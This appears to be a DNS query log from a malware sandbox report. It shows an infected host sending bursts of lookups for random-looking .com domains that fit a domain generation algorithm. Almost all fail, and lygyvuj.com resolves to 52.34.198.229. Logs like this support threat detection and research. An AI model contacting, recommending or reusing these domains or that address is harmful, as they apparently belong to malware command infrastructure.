                                                                                                                                                                                                          Nov 11, 2024 18:24:21.823096037 CET1.1.1.1192.168.2.80x112eName error (3)pujyduv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.823483944 CET1.1.1.1192.168.2.80x93bdName error (3)qekynog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.823930025 CET1.1.1.1192.168.2.80x339cName error (3)gatypas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.825007915 CET1.1.1.1192.168.2.80x8f2bName error (3)lykyfud.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.825062037 CET1.1.1.1192.168.2.80x4312Name error (3)vopyzot.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.827394962 CET1.1.1.1192.168.2.80x576aName error (3)qexyhap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.829668999 CET1.1.1.1192.168.2.80xc2deName error (3)qedysyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.830125093 CET1.1.1.1192.168.2.80x4945Name error (3)lykynon.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.832068920 CET1.1.1.1192.168.2.80x55b9Name error (3)volymaf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.833256006 CET1.1.1.1192.168.2.80x77e2Name error (3)ganykuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.842951059 CET1.1.1.1192.168.2.80x902eName error (3)galynab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.845145941 CET1.1.1.1192.168.2.80x3578Name error (3)pujybig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.845845938 CET1.1.1.1192.168.2.80x592dName error (3)ganyqyh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.846172094 CET1.1.1.1192.168.2.80xfe68Name error (3)qekyfiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.864125013 CET1.1.1.1192.168.2.80x6bf3Name error (3)vojybim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.866640091 CET1.1.1.1192.168.2.80xdf06Name error (3)puvyjyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.867420912 CET1.1.1.1192.168.2.80x8a78Name error (3)pupyxal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.869013071 CET1.1.1.1192.168.2.80x7faeName error (3)vonykuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.870426893 CET1.1.1.1192.168.2.80xb4a9Name error (3)pupypep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.871998072 CET1.1.1.1192.168.2.80xc948Name error (3)lyvyjyr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.878592968 CET1.1.1.1192.168.2.80x8791Name error (3)vonyqym.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.878894091 CET1.1.1.1192.168.2.80x8f81Name error (3)gahyvuh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.889595985 CET1.1.1.1192.168.2.80x5b07Name error (3)vofycyk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.892457962 CET1.1.1.1192.168.2.80x6e6bName error (3)vocymak.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.894125938 CET1.1.1.1192.168.2.80x412cName error (3)gadycew.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.896699905 CET1.1.1.1192.168.2.80x7ac2Name error (3)lysyxar.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.909364939 CET1.1.1.1192.168.2.80x3fe6Name error (3)qebyqeq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.910341978 CET1.1.1.1192.168.2.80x2da3Name error (3)vojyduf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.915875912 CET1.1.1.1192.168.2.80x76afName error (3)puvymaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.929688931 CET1.1.1.1192.168.2.80x680Name error (3)volygoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.930541992 CET1.1.1.1192.168.2.80x1e6cName error (3)vowykuc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.930552959 CET1.1.1.1192.168.2.80x250eName error (3)galyfis.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.931813955 CET1.1.1.1192.168.2.80xb1dName error (3)qedyxel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.939680099 CET1.1.1.1192.168.2.80x8394Name error (3)gahydyb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.939795971 CET1.1.1.1192.168.2.80x57e0Name error (3)puzygop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.945103884 CET1.1.1.1192.168.2.80xe1e9No error (0)lygyvuj.com52.34.198.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.961179972 CET1.1.1.1192.168.2.80xe9c7Name error (3)vocyjet.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.669967890 CET1.1.1.1192.168.2.80x4081Name error (3)qeqykyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.672981977 CET1.1.1.1192.168.2.80xb945Name error (3)pumyjev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.673001051 CET1.1.1.1192.168.2.80x63dbName error (3)gadypah.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.676795006 CET1.1.1.1192.168.2.80x67aaName error (3)puryjeq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.687175035 CET1.1.1.1192.168.2.80x10c5Name error (3)qedytoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.702023029 CET1.1.1.1192.168.2.80x75Name error (3)gahypoz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.704840899 CET1.1.1.1192.168.2.80x47e3Name error (3)vofypam.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.721302986 CET1.1.1.1192.168.2.80x749aName error (3)galyvuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.731575966 CET1.1.1.1192.168.2.80xf7efName error (3)vocygim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.734426975 CET1.1.1.1192.168.2.80xae70Name error (3)pujypal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.734458923 CET1.1.1.1192.168.2.80x6942Name error (3)volybut.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.734822035 CET1.1.1.1192.168.2.80x8277Name error (3)qekyvup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.735220909 CET1.1.1.1192.168.2.80xcd42Name error (3)purywyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.745903015 CET1.1.1.1192.168.2.80x6840Name error (3)gatyruw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.745932102 CET1.1.1.1192.168.2.80xc806Name error (3)lyrywur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.745943069 CET1.1.1.1192.168.2.80xa30aName error (3)lyvygon.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.752832890 CET1.1.1.1192.168.2.80x77f5Name error (3)vowyqyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.753063917 CET1.1.1.1192.168.2.80x7dc1Name error (3)qetyrul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.753237009 CET1.1.1.1192.168.2.80x5e60Name error (3)qedylig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.753252029 CET1.1.1.1192.168.2.80x1042Name error (3)ganyhab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.753563881 CET1.1.1.1192.168.2.80x1848Name error (3)lyxyfuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.754992008 CET1.1.1.1192.168.2.80xcafaName error (3)lysytoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.755095959 CET1.1.1.1192.168.2.80x5fd8Name error (3)qegytop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.755702019 CET1.1.1.1192.168.2.80x66c8Name error (3)vonyjef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.757713079 CET1.1.1.1192.168.2.80x86acName error (3)lykyvyx.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.759919882 CET1.1.1.1192.168.2.80xe54fName error (3)qegyxav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.764588118 CET1.1.1.1192.168.2.80x4cdcName error (3)pufyxov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.766681910 CET1.1.1.1192.168.2.80x8402Name error (3)puvygog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.770591974 CET1.1.1.1192.168.2.80x7e48Name error (3)vopyrik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.771595001 CET1.1.1.1192.168.2.80x941cName error (3)gadyzib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.772109985 CET1.1.1.1192.168.2.80xa610Name error (3)lykyser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.772986889 CET1.1.1.1192.168.2.80x2b4fName error (3)gacyfih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.774447918 CET1.1.1.1192.168.2.80x8c37Name error (3)vojycec.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.774467945 CET1.1.1.1192.168.2.80x6562Name error (3)gahyces.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.774481058 CET1.1.1.1192.168.2.80xa58eName error (3)vofyzof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.774982929 CET1.1.1.1192.168.2.80x5d46Name error (3)galydyw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.775741100 CET1.1.1.1192.168.2.80x3f86Name error (3)pupylug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.776966095 CET1.1.1.1192.168.2.80x40a2Name error (3)vonymoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.781848907 CET1.1.1.1192.168.2.80xf064Name error (3)qebyhag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.782665968 CET1.1.1.1192.168.2.80x2681Name error (3)qeqyqep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.782824993 CET1.1.1.1192.168.2.80x1189Name error (3)pujycyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.786601067 CET1.1.1.1192.168.2.80xfb65Name error (3)lygyxad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.786664963 CET1.1.1.1192.168.2.80xdff8Name error (3)pumymap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.787235022 CET1.1.1.1192.168.2.80xe232Name error (3)gaqyqez.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.787892103 CET1.1.1.1192.168.2.80x1f00Name error (3)volydyk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.788908958 CET1.1.1.1192.168.2.80x2f15Name error (3)vocybuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.789427042 CET1.1.1.1192.168.2.80xc4a3Name error (3)qetykyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.790016890 CET1.1.1.1192.168.2.80xd830Name error (3)qebyniv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.790364027 CET1.1.1.1192.168.2.80xccf3Name error (3)qexyfuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.790676117 CET1.1.1.1192.168.2.80x9ee7Name error (3)ganynos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.791372061 CET1.1.1.1192.168.2.80x7f80Name error (3)vojypat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.791920900 CET1.1.1.1192.168.2.80x634aName error (3)puzybil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.793446064 CET1.1.1.1192.168.2.80xb844Name error (3)lymymax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.795609951 CET1.1.1.1192.168.2.80x7dd7Name error (3)vopykum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.797873974 CET1.1.1.1192.168.2.80x7fc1Name error (3)lysylun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.797888041 CET1.1.1.1192.168.2.80x62d6Name error (3)lyvynid.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.797899008 CET1.1.1.1192.168.2.80x1a08Name error (3)lyryjej.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.806186914 CET1.1.1.1192.168.2.80xf02eName error (3)puvybuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.806205988 CET1.1.1.1192.168.2.80x6804Name error (3)pupytiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.810827017 CET1.1.1.1192.168.2.80xdcc0Name error (3)lymyjyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.811181068 CET1.1.1.1192.168.2.80x6d89Name error (3)qekysel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.811283112 CET1.1.1.1192.168.2.80x2159Name error (3)gatykyh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.827794075 CET1.1.1.1192.168.2.80xc3f0Name error (3)lyxynir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.294253111 CET1.1.1.1192.168.2.80xad5fName error (3)gacyvub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.299565077 CET1.1.1.1192.168.2.80x7996Name error (3)vowyjak.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.312547922 CET1.1.1.1192.168.2.80xcdb3Name error (3)qexyvyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.327869892 CET1.1.1.1192.168.2.80x1680Name error (3)qeqyhol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.340569973 CET1.1.1.1192.168.2.80x90e6Name error (3)pupywyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.355411053 CET1.1.1.1192.168.2.80xd209Name error (3)vonygit.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.366434097 CET1.1.1.1192.168.2.80xdaf7Name error (3)ganyfuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.369879961 CET1.1.1.1192.168.2.80x665bName error (3)vopyqef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.375159979 CET1.1.1.1192.168.2.80xb690Name error (3)qekyxaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.381467104 CET1.1.1.1192.168.2.80xfd19Name error (3)gatyhos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.406246901 CET1.1.1.1192.168.2.80xd918Name error (3)lyryman.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.416829109 CET1.1.1.1192.168.2.80xd036Name error (3)gahyziw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.418477058 CET1.1.1.1192.168.2.80x3fc7Name error (3)qebyfup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.423719883 CET1.1.1.1192.168.2.80xb2faName error (3)puzypav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.431706905 CET1.1.1.1192.168.2.80x55c0Name error (3)pujytug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.436573982 CET1.1.1.1192.168.2.80xe732Name error (3)gadykyz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.439690113 CET1.1.1.1192.168.2.80xaf83Name error (3)lykytin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.450412035 CET1.1.1.1192.168.2.80x525aName error (3)lyxysad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.461077929 CET1.1.1.1192.168.2.80x27acName error (3)pufylul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.461489916 CET1.1.1.1192.168.2.80xb981Name error (3)puvydyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.462155104 CET1.1.1.1192.168.2.80xcbe5Name error (3)qexysev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.464596033 CET1.1.1.1192.168.2.80xd0c1Name error (3)vowymom.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.475658894 CET1.1.1.1192.168.2.80x206fName error (3)lyvyfux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.476016045 CET1.1.1.1192.168.2.80x3303Name error (3)ganyvyw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.476433039 CET1.1.1.1192.168.2.80xef88Name error (3)pumybuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.476450920 CET1.1.1.1192.168.2.80x22c4Name error (3)qekytig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.476469994 CET1.1.1.1192.168.2.80x3d4Name error (3)lysyjex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.477087975 CET1.1.1.1192.168.2.80x1d48Name error (3)vofyruc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.477494001 CET1.1.1.1192.168.2.80x1c11Name error (3)vonybuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.477792978 CET1.1.1.1192.168.2.80x4513Name error (3)qedykep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.477803946 CET1.1.1.1192.168.2.80x67a8Name error (3)galycah.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.477823019 CET1.1.1.1192.168.2.80x996dName error (3)qeqyniq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.478524923 CET1.1.1.1192.168.2.80x8191Name error (3)pumygil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.479377031 CET1.1.1.1192.168.2.80x7041Name error (3)qedyruv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.479444981 CET1.1.1.1192.168.2.80x32f0Name error (3)galypob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.479454994 CET1.1.1.1192.168.2.80x2bd8Name error (3)pujyxoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.479502916 CET1.1.1.1192.168.2.80x4733Name error (3)lymygor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.479768038 CET1.1.1.1192.168.2.80x71aeName error (3)vojyrum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.480309963 CET1.1.1.1192.168.2.80x69f3Name error (3)puzyceg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.481339931 CET1.1.1.1192.168.2.80xcdc3Name error (3)vojyzik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.481349945 CET1.1.1.1192.168.2.80x849dName error (3)vofykyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.483144045 CET1.1.1.1192.168.2.80x857aName error (3)gaqynih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.484029055 CET1.1.1.1192.168.2.80xa680Name error (3)purymog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.487610102 CET1.1.1.1192.168.2.80x80aName error (3)lyvyver.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.491575956 CET1.1.1.1192.168.2.80xfbf8Name error (3)vocydyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.494565010 CET1.1.1.1192.168.2.80x94abName error (3)qegylul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.496081114 CET1.1.1.1192.168.2.80x3bb1Name error (3)vopyjac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.496902943 CET1.1.1.1192.168.2.80xfc40Name error (3)gatyqeb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.499545097 CET1.1.1.1192.168.2.80xd19aName error (3)volypof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.500998974 CET1.1.1.1192.168.2.80x1a28Name error (3)gacydes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.502255917 CET1.1.1.1192.168.2.80x682Name error (3)lyxyvyn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.518063068 CET1.1.1.1192.168.2.80x54dName error (3)pufytip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.525393009 CET1.1.1.1192.168.2.80xf630Name error (3)pupyjap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.526379108 CET1.1.1.1192.168.2.80x4d79Name error (3)gadyrus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.528892040 CET1.1.1.1192.168.2.80xfec4Name error (3)lymynuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.530241966 CET1.1.1.1192.168.2.80x2ed8Name error (3)volycem.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.535099030 CET1.1.1.1192.168.2.80x4324Name error (3)qetyhov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.543221951 CET1.1.1.1192.168.2.80xc62fName error (3)lygytix.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.547774076 CET1.1.1.1192.168.2.80x2b00Name error (3)lykyxoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.549132109 CET1.1.1.1192.168.2.80xf9adName error (3)qetyqag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.549144030 CET1.1.1.1192.168.2.80xbd5eName error (3)lygylur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.549392939 CET1.1.1.1192.168.2.80x2d11Name error (3)qebyvyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.550438881 CET1.1.1.1192.168.2.80xcef2Name error (3)gaqyhaw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.025588989 CET1.1.1.1192.168.2.80x280fName error (3)qexyxop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.027379036 CET1.1.1.1192.168.2.80x29bName error (3)lygywyj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.038991928 CET1.1.1.1192.168.2.80xa1d2Name error (3)qedyhiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.042332888 CET1.1.1.1192.168.2.80x2805Name error (3)pumycav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.045739889 CET1.1.1.1192.168.2.80xd081Name error (3)gadyhoh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.057550907 CET1.1.1.1192.168.2.80xadafName error (3)lykywex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.058239937 CET1.1.1.1192.168.2.80xb452Name error (3)lysygij.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.058983088 CET1.1.1.1192.168.2.80x2742Name error (3)volyrut.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.060688972 CET1.1.1.1192.168.2.80x8e81Name error (3)qekyryp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.061213017 CET1.1.1.1192.168.2.80x1b73Name error (3)gahyruh.comnonenoneA (IP address)IN (0x0001)false
